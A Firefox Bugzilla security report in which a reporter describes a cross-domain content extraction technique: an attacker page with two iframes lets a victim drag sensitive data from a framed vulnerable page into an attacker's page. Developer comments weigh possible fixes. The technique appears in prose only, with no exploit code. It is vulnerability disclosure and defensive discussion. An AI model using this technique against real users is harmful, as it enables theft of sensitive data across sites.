Open
Bug 822215
Opened 11 years ago
Updated 1 year ago
iframe-to-iframe cross-domain extraction method (UI Redressing)
Categories
(Core :: DOM: Copy & Paste and Drag & Drop, defect)
Tracking
()
NEW
People
(Reporter: luca.defulgentis, Unassigned)
References
()
Details
(Keywords: csectype-spoof, sec-moderate)
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0 Build ID: 20121128204232 Steps to reproduce: Hi Folks, I found a new cross-domain content extraction method that could be used in order to exploit UI Redressing issue under Firefox. The extraction method is extremely simple: instead of performing a drag&drop action of sensitive data, from a framed vulnerable web page to the framing one (attacker-controlled), the victim is triggered to navigate a malicious html page that includes two iframes: the former frames the vulnerable page - where the sensitive content resides - while the latter frames another attacker's page that is used to drop the extracted content. Firefox is not able to block this kind of attack because no check on cross-domain drag&drop between iframes is performed. The (iframe-to-iframe) method was tested against the latest version of Firefox. Further details can be found here: blog.nibblesec.org Thanks, Luca
Updated•11 years ago
|
Component: Untriaged → Security
Updated•11 years ago
|
Status: UNCONFIRMED → NEW
Component: Security → Drag and Drop
Ever confirmed: true
Keywords: csec-ui-redress,
sec-moderate
Product: Firefox → Core
Comment 1•11 years ago
|
||
As noted at http://blog.nibblesec.org/2012/12/ui-redressing-mayhem-firefox-0day-and.html dragging from a frame to a cross-origin parent was blocked by the fix in bug 605991. It could be we don't want to address the drag and drop aspect of this--I bet it breaks a lot of things--but instead kill support for view-source: in anything but a top-level window/tab. I'm sure that will break things too (it'll break one of my old bookmarklets, for example) but since they will be Gecko-only things it's more defensible.
See Also: → 605991
Comment 2•11 years ago
|
||
In addition to the nibblesec blog this was referenced at the end of a recent ThreatPost article, http://threatpost.com/en_us/blogs/chrome-clickjacking-vulnerability-could-expose-user-information-google-amazon-010213
Comment 3•11 years ago
|
||
Disabling "view-source:" for iframes won't really solve this, because plenty of sensitive data is shown as text. Sounds to me like we just need to complete the fix for bug 605991, so it also applies to iframe-to-iframe dragging.
Comment 5•11 years ago
|
||
So the idea is to block dragging from a content frame to another content frame within the same toplevel parent?
Flags: needinfo?(enndeakin)
Comment 6•11 years ago
|
||
sounds like so. It is strict, but how else could this be resolved.
Updated•2 years ago
|
Severity: normal → S3
You need to log in
before you can comment on or make changes to this bug.
Description
•